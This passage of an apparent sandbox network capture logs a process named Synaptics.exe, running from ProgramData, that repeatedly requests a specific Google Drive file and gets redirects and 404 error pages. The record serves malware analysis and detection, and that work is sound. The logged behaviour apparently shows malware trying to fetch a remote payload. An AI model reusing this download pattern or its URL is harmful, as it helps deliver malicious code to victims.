                                                                                                                                      2024-12-30 10:23:12 UTC    143    OUT    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:12 UTC    1314    IN    HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:12 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-B538g5B-wrSZbzquq2WJUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      25    192.168.2.5    49753    142.250.186.33    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:12 UTC    388    OUT    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      26    192.168.2.5    49754    142.250.186.110    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:12 UTC    143    OUT    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      27    192.168.2.5    49755    142.250.186.33    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:12 UTC    388    OUT    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      28    192.168.2.5    49759    142.250.186.110    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:13 UTC    143    OUT    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:13 UTC    1314    IN    HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YHnEjAeIEAIma2s6yHnL6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      29    192.168.2.5    49761    142.250.186.110    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:13 UTC    143    OUT    GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:13 UTC    1314    IN    HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XJObjo2xduGa8tdvItiFiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                      30    192.168.2.5    49760    142.250.186.33    443    6192    C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                      2024-12-30 10:23:13 UTC    388    OUT    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:13 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4GF9Y45-KPByo5NRTVd0HxIQZVqFqnlcB6_xJvW7KR-aptmL7Pd3XfB2uu7ScAiNNTWoFn01M
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:13 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PUq9l4zQOIWRR5xMvQDUGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:13 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:13 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="EmFOaPHpfjwnhKtJO5U2mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:13 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      31 | 192.168.2.5 | 49764 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:14 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:14 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5OdNQT4lZuEo8cQMk_hcJ1-aA2_iEWbjW7jRh-H0d4P7Fej2lKpleZrxPWj6prueBuD8G14lU
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QJhf_BMw94pBrg7RnOCO3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:14 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:14 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="GCsIfmTYGtwYKm_EzneQwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:14 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      32 | 192.168.2.5 | 49766 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Jp3LPVGppGhlvJ9bHd6Jhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      33 | 192.168.2.5 | 49765 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-plBgU1MGCenGNCcVk2lrhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      34 | 192.168.2.5 | 49767 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:14 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:14 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7klrstWaAIVAR_hsm0jmZROZA-pF8YXAmO3dKJXN-7-zEANOrdPV19-R2l-RHbQsyFCIsMDwU
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:14 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lSaWpbEL5-n2JFX2_k8KWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:14 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:14 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="bbQ0QjuI8LlHuH5u2wqJ5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:14 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49770 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:15 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6YS6OcP-58oIoOTy1-OU39GSZDZ9AcIAhTC5HisoIKfqAEMIXOdeKnP6oPCDEK2ZOd
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:15 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CXqyOhE7v4xNR9mGVzc0bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:15 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:15 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="2Y2lY-lR3s3jXL7CCMRJcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:15 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49771 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:23:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
